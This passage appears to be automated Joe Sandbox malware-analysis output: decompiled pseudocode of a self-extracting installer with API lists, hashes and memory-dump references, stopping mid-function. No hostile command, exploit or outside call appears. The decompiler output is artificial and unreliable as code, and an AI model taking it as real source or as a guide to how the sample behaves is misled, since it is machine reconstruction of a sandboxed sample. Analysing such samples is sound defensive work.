                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9191F1B3A012149BEF34CB65CD907EAB3B4EB51344F1541A9D88A97281DBB18F828F41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 83%
                                                                                                                                                                                                      			E00A66495(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				void* __edi;
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				signed char _t14;
                                                                                                                                                                                                      				struct HINSTANCE__* _t15;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				CHAR* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				signed int _t28;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t27 = __esi;
                                                                                                                                                                                                      				_t18 = __ebx;
                                                                                                                                                                                                      				_t9 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t9 ^ _t28;
                                                                                                                                                                                                      				_push(__ecx);
                                                                                                                                                                                                      				E00A61781( &_v268, 0x104, __ecx, "C:\Users\alfons\AppData\Local\Temp\IXP003.TMP\");
                                                                                                                                                                                                      				_t26 = "advpack.dll";
                                                                                                                                                                                                      				E00A6658A( &_v268, 0x104, _t26);
                                                                                                                                                                                                      				_t14 = GetFileAttributesA( &_v268);
                                                                                                                                                                                                      				if(_t14 == 0xffffffff || (_t14 & 0x00000010) != 0) {
                                                                                                                                                                                                      					_t15 = LoadLibraryA(_t26);
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t15 = LoadLibraryExA( &_v268, 0, 8);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t15, _t18, _v8 ^ _t28, 0x104, _t26, _t27);
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(?,advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00A664DF
                                                                                                                                                                                                      • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00A664F9
                                                                                                                                                                                                      • LoadLibraryA.KERNEL32(advpack.dll,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000000), ref: 00A66502
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$advpack.dll
                                                                                                                                                                                                      • API String ID: 438848745-1736355793
                                                                                                                                                                                                      • Opcode ID: c8cb302789d260d5145b80e766845b6ee523d3257514b1ac6c09b8164787f54d
                                                                                                                                                                                                      • Instruction ID: 31a934fb9e8253821486066aab7d8c4887b7d5291993177c2c6b8aed88f60eea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c8cb302789d260d5145b80e766845b6ee523d3257514b1ac6c09b8164787f54d
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9F01F430A04108ABDB60DBA4DC4AEEE7778EB61311F500299F596A31C0DFB09E8ACE51
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A628E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				char* _v12;
                                                                                                                                                                                                      				intOrPtr _v16;
                                                                                                                                                                                                      				void* _v20;
                                                                                                                                                                                                      				intOrPtr _v24;
                                                                                                                                                                                                      				int _v28;
                                                                                                                                                                                                      				int _v32;
                                                                                                                                                                                                      				void* _v36;
                                                                                                                                                                                                      				int _v40;
                                                                                                                                                                                                      				void* _v44;
                                                                                                                                                                                                      				intOrPtr _v48;
                                                                                                                                                                                                      				intOrPtr _v52;
                                                                                                                                                                                                      				intOrPtr _v56;
                                                                                                                                                                                                      				intOrPtr _v60;
                                                                                                                                                                                                      				intOrPtr _v64;
                                                                                                                                                                                                      				long _t68;
                                                                                                                                                                                                      				void* _t70;
                                                                                                                                                                                                      				void* _t73;
                                                                                                                                                                                                      				void* _t79;
                                                                                                                                                                                                      				void* _t83;
                                                                                                                                                                                                      				void* _t87;
                                                                                                                                                                                                      				void* _t88;
                                                                                                                                                                                                      				intOrPtr _t93;
                                                                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                                                                      				intOrPtr _t99;
                                                                                                                                                                                                      				int _t101;
                                                                                                                                                                                                      				void* _t103;
                                                                                                                                                                                                      				void* _t106;
                                                                                                                                                                                                      				void* _t109;
                                                                                                                                                                                                      				void* _t110;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_v12 = __edx;
                                                                                                                                                                                                      				_t99 = __ecx;
                                                                                                                                                                                                      				_t106 = 0;
                                                                                                                                                                                                      				_v16 = __ecx;
                                                                                                                                                                                                      				_t87 = 0;
                                                                                                                                                                                                      				_t103 = 0;
                                                                                                                                                                                                      				_v20 = 0;
                                                                                                                                                                                                      				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                      					L19:
                                                                                                                                                                                                      					_t106 = 1;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t62 = 0;
                                                                                                                                                                                                      					_v8 = 0;
                                                                                                                                                                                                      					while(1) {
                                                                                                                                                                                                      						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                      						if(E00A62773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                      							goto L20;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t68 = GetFileVersionInfoSizeA(_v12,  &_v32);
                                                                                                                                                                                                      						_v28 = _t68;
                                                                                                                                                                                                      						if(_t68 == 0) {
                                                                                                                                                                                                      							_t99 = _v16;
                                                                                                                                                                                                      							_t70 = _v8 + _t99;
                                                                                                                                                                                                      							_t93 = _v24;
                                                                                                                                                                                                      							_t87 = _v20;
                                                                                                                                                                                                      							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                      								goto L18;
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                      							if(_t103 != 0) {
                                                                                                                                                                                                      								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                      								_v36 = _t73;
                                                                                                                                                                                                      								if(_t73 != 0) {
                                                                                                                                                                                                      									if(GetFileVersionInfoA(_v12, _v32, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                      										L15:
                                                                                                                                                                                                      										GlobalUnlock(_t103);
                                                                                                                                                                                                      										_t99 = _v16;
                                                                                                                                                                                                      										L18:
                                                                                                                                                                                                      										_t87 = _t87 + 1;
                                                                                                                                                                                                      										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                      										_v20 = _t87;
                                                                                                                                                                                                      										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                      										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                      											continue;
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L19;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									} else {
                                                                                                                                                                                                      										_t79 = _v44;
                                                                                                                                                                                                      										_t88 = _t106;
                                                                                                                                                                                                      										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                      										_t101 = _v28;
                                                                                                                                                                                                      										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                      										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                      										_t97 = _v48;
                                                                                                                                                                                                      										_v36 = _t83;
                                                                                                                                                                                                      										_t109 = _t83;
                                                                                                                                                                                                      										do {
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00A62A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                      											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00A62A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                      											_t109 = _t109 + 0x18;
                                                                                                                                                                                                      											_t88 = _t88 + 4;
                                                                                                                                                                                                      										} while (_t88 < 8);
                                                                                                                                                                                                      										_t87 = _v20;
                                                                                                                                                                                                      										_t106 = 0;
                                                                                                                                                                                                      										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                      											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                      												GlobalUnlock(_t103);
                                                                                                                                                                                                      											} else {
                                                                                                                                                                                                      												goto L15;
                                                                                                                                                                                                      											}
                                                                                                                                                                                                      										} else {
                                                                                                                                                                                                      											goto L15;
                                                                                                                                                                                                      										}
                                                                                                                                                                                                      									}
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						goto L20;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				L20:
                                                                                                                                                                                                      				 *_a8 = _t87;
                                                                                                                                                                                                      				if(_t103 != 0) {
                                                                                                                                                                                                      					GlobalFree(_t103);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return _t106;
                                                                                                                                                                                                      			}
                                                                                                                                                                                                      0x00a62a0f
                                                                                                                                                                                                      0x00a62a19
                                                                                                                                                                                                      0x00a62a81
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a62a0f
                                                                                                                                                                                                      0x00a6298c
                                                                                                                                                                                                      0x00a62974
                                                                                                                                                                                                      0x00a62962
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00a6294f
                                                                                                                                                                                                      0x00a62912
                                                                                                                                                                                                      0x00a62a65
                                                                                                                                                                                                      0x00a62a68
                                                                                                                                                                                                      0x00a62a6c
                                                                                                                                                                                                      0x00a62a6f
                                                                                                                                                                                                      0x00a62a6f
                                                                                                                                                                                                      0x00a62a7d

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • GlobalFree.KERNEL32 ref: 00A62A6F
                                                                                                                                                                                                        • Part of subcall function 00A62773: CharUpperA.USER32(FEEDC76E,00000000,00000000,00000000), ref: 00A627A8
                                                                                                                                                                                                        • Part of subcall function 00A62773: CharNextA.USER32(0000054D), ref: 00A627B5
                                                                                                                                                                                                        • Part of subcall function 00A62773: CharNextA.USER32(00000000), ref: 00A627BC
                                                                                                                                                                                                        • Part of subcall function 00A62773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62829
                                                                                                                                                                                                        • Part of subcall function 00A62773: RegQueryValueExA.ADVAPI32(?,00A61140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62852
                                                                                                                                                                                                        • Part of subcall function 00A62773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A62870
                                                                                                                                                                                                        • Part of subcall function 00A62773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A628A0
                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,?,?,?,?,?,?,00A63938,?,?,?,?,-00000005), ref: 00A62958
                                                                                                                                                                                                      • GlobalLock.KERNEL32 ref: 00A62969
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A63938,?,?,?,?,-00000005,?), ref: 00A62A21
                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000,?,?,?,?), ref: 00A62A81
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Global$Char$NextUnlock$AllocCloseEnvironmentExpandFreeLockOpenQueryStringsUpperValue
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 3949799724-0
                                                                                                                                                                                                      • Opcode ID: 4e677da04dcd4090d9e6ab1e2ee072a77b246d591a7480983c938e4b95b1b9b7
                                                                                                                                                                                                      • Instruction ID: 64516cd440bc2238226db5026ed021337bbeca62952fbdc99d26a61a4b23a38d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4e677da04dcd4090d9e6ab1e2ee072a77b246d591a7480983c938e4b95b1b9b7
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 74512831E00619EBCB21CFE8C984AAEBBB5FF58740F14402AE905E3261DBB19941DF90
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A647E0(intOrPtr* __ecx) {
                                                                                                                                                                                                      				intOrPtr _t6;
                                                                                                                                                                                                      				intOrPtr _t9;
                                                                                                                                                                                                      				void* _t11;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				intOrPtr* _t22;
                                                                                                                                                                                                      				void _t24;
                                                                                                                                                                                                      				struct HWND__* _t25;
                                                                                                                                                                                                      				struct HWND__* _t26;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				intOrPtr* _t28;
                                                                                                                                                                                                      				intOrPtr* _t33;
                                                                                                                                                                                                      				void* _t34;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __ecx;
                                                                                                                                                                                                      				_t34 = LocalAlloc(0x40, 8);
                                                                                                                                                                                                      				if(_t34 != 0) {
                                                                                                                                                                                                      					_t22 = _t33;
                                                                                                                                                                                                      					_t27 = _t22 + 1;
                                                                                                                                                                                                      					do {
                                                                                                                                                                                                      						_t6 =  *_t22;
                                                                                                                                                                                                      						_t22 = _t22 + 1;
                                                                                                                                                                                                      					} while (_t6 != 0);
                                                                                                                                                                                                      					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                                                                                                                                                                                                      					 *_t34 = _t24;
                                                                                                                                                                                                      					if(_t24 != 0) {
                                                                                                                                                                                                      						_t28 = _t33;
                                                                                                                                                                                                      						_t19 = _t28 + 1;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t9 =  *_t28;
                                                                                                                                                                                                      							_t28 = _t28 + 1;
                                                                                                                                                                                                      						} while (_t9 != 0);
                                                                                                                                                                                                      						E00A61680(_t24, _t28 - _t19 + 1, _t33);
                                                                                                                                                                                                      						_t11 =  *0xa691e0; // 0x707b70
                                                                                                                                                                                                      						 *(_t34 + 4) = _t11;
                                                                                                                                                                                                      						 *0xa691e0 = _t34;
                                                                                                                                                                                                      						return 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t25 =  *0xa68584; // 0x0
                                                                                                                                                                                                      					E00A644B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                      					LocalFree(_t34);
                                                                                                                                                                                                      					L2:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t26 =  *0xa68584; // 0x0
                                                                                                                                                                                                      				E00A644B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                                                                                                                                                                                                      				goto L2;
                                                                                                                                                                                                      			}


                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A64E6F), ref: 00A647EA
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00A64823
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A64847
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Local$Alloc$FreeLoadMessageString
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$p{p
                                                                                                                                                                                                      • API String ID: 359063898-2520046281
                                                                                                                                                                                                      • Opcode ID: c11ddbb3113cd9637a760e87f588b47c045729b36013692002980499e34281ad
                                                                                                                                                                                                      • Instruction ID: a175aa2534b8efc5fe74f7609bc89468627a4820ac01957f73131c0def399aab
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c11ddbb3113cd9637a760e87f588b47c045729b36013692002980499e34281ad
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 861102B9204641AFD764DF649C18F773B7AEB8A300F148619EA829B241DA768C078760
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 32%
                                                                                                                                                                                                      			E00A64169(void* __eflags) {
                                                                                                                                                                                                      				int _t18;
                                                                                                                                                                                                      				void* _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 = E00A6468F("FINISHMSG", 0, 0);
                                                                                                                                                                                                      				_t21 = LocalAlloc(0x40, 4 + _t3 * 4);
                                                                                                                                                                                                      				if(_t21 != 0) {
                                                                                                                                                                                                      					if(E00A6468F("FINISHMSG", _t21, _t20) != 0) {
                                                                                                                                                                                                      						if(lstrcmpA(_t21, "<None>") == 0) {
                                                                                                                                                                                                      							L7:
                                                                                                                                                                                                      							return LocalFree(_t21);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(0x40);
                                                                                                                                                                                                      						_push(0);
                                                                                                                                                                                                      						_push(_t21);
                                                                                                                                                                                                      						_t18 = 0x3e9;
                                                                                                                                                                                                      						L6:
                                                                                                                                                                                                      						E00A644B9(0, _t18);
                                                                                                                                                                                                      						goto L7;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0x10);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_push(0);
                                                                                                                                                                                                      					_t18 = 0x4b1;
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A644B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                      			}






                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646A0
                                                                                                                                                                                                        • Part of subcall function 00A6468F: SizeofResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646A9
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 00A646C3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LoadResource.KERNEL32(00000000,00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646CC
                                                                                                                                                                                                        • Part of subcall function 00A6468F: LockResource.KERNEL32(00000000,?,00A62D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646D3
                                                                                                                                                                                                        • Part of subcall function 00A6468F: memcpy_s.MSVCRT ref: 00A646E5
                                                                                                                                                                                                        • Part of subcall function 00A6468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A646EF
                                                                                                                                                                                                      • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A630B4), ref: 00A64189
                                                                                                                                                                                                      • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A630B4), ref: 00A641E7
                                                                                                                                                                                                        • Part of subcall function 00A644B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A64518
                                                                                                                                                                                                        • Part of subcall function 00A644B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 00A64554
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                      • String ID: <None>$FINISHMSG
                                                                                                                                                                                                      • API String ID: 3507850446-3091758298
                                                                                                                                                                                                      • Opcode ID: 1888a464a41745ce12f00e238494cd4ec7ad67a5cbf30144ef56c6871bee2e2b
                                                                                                                                                                                                      • Instruction ID: 6eda204a7f68eca3c2120916f84dc70d120f79c4d0232a92ee18acd7a64775bb
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1888a464a41745ce12f00e238494cd4ec7ad67a5cbf30144ef56c6871bee2e2b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9701FFF53002247FF32427A58C8AF7B25BEDBEA795F054225B706E22809EA8CC4241B5
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E00A619E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v520;
                                                                                                                                                                                                      				void* __esi;
                                                                                                                                                                                                      				signed int _t11;
                                                                                                                                                                                                      				void* _t14;
                                                                                                                                                                                                      				void* _t23;
                                                                                                                                                                                                      				void* _t27;
                                                                                                                                                                                                      				void* _t33;
                                                                                                                                                                                                      				struct HWND__* _t34;
                                                                                                                                                                                                      				signed int _t35;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t33 = __edi;
                                                                                                                                                                                                      				_t27 = __ebx;
                                                                                                                                                                                                      				_t11 =  *0xa68004; // 0xfeedc76e
                                                                                                                                                                                                      				_v8 = _t11 ^ _t35;
                                                                                                                                                                                                      				_t34 = _a4;
                                                                                                                                                                                                      				_t14 = _a8 - 0x110;
                                                                                                                                                                                                      				if(_t14 == 0) {
                                                                                                                                                                                                      					_t32 = GetDesktopWindow();
                                                                                                                                                                                                      					E00A643D0(_t34, _t15);
                                                                                                                                                                                                      					_v520 = 0;
                                                                                                                                                                                                      					LoadStringA( *0xa69a3c, _a16,  &_v520, 0x200);
                                                                                                                                                                                                      					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                                                                                                                                                                                                      					MessageBeep(0xffffffff);
                                                                                                                                                                                                      					goto L6;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if(_t14 != 1) {
                                                                                                                                                                                                      						L4:
                                                                                                                                                                                                      						_t23 = 0;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t32 = _a12;
                                                                                                                                                                                                      						if(_t32 - 0x83d > 1) {
                                                                                                                                                                                                      							goto L4;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							EndDialog(_t34, _t32);
                                                                                                                                                                                                      							L6:
                                                                                                                                                                                                      							_t23 = 1;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return E00A66CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                                                                                                                                                                                                      			}














                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • EndDialog.USER32(?,?), ref: 00A61A18
                                                                                                                                                                                                      • GetDesktopWindow.USER32 ref: 00A61A24
                                                                                                                                                                                                      • LoadStringA.USER32(?,?,00000200), ref: 00A61A4F
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A61A62
                                                                                                                                                                                                      • MessageBeep.USER32(000000FF), ref: 00A61A6A
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000003.00000002.419090309.0000000000A61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000003.00000002.419004425.0000000000A60000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419265709.0000000000A68000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      • Associated: 00000003.00000002.419338078.0000000000A6C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_a60000_smi53cv51.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1273765764-0
                                                                                                                                                                                                      • Opcode ID: 581a8199f462b0053c4f166a1516a892de38e53c02bf5a5d5c0a3e05b5678279
                                                                                                                                                                                                      • Instruction ID: 84164cb95833f8903d6a0b36d7bcb80b72844f492ce02975bb2ab42571ec3c6e
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 581a8199f462b0053c4f166a1516a892de38e53c02bf5a5d5c0a3e05b5678279
                                                                                                                                                                                                      • Instruction Fuzzy Hash: C911A131501119AFDB10EFA4DE08AAE7BB8FF6A340F148254F912E6190DE74AE02CB95
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E00A67155() {
                                                                                                                                                                                                      				void* _v8;
                                                                                                                                                                                                      				struct _FILETIME _v16;
                                                                                                                                                                                                      				signed int _v20;
                                                                                                                                                                                                      				union _LARGE_INTEGER _v24;
                                                                                                                                                                                                      				signed int _t23;
                                                                                                                                                                                                      				signed int _t36;
                                                                                                                                                                                                      				signed int _t37;
                                                                                                                                                                                                      				signed int _t39;
                                                                                                                                                                                                      
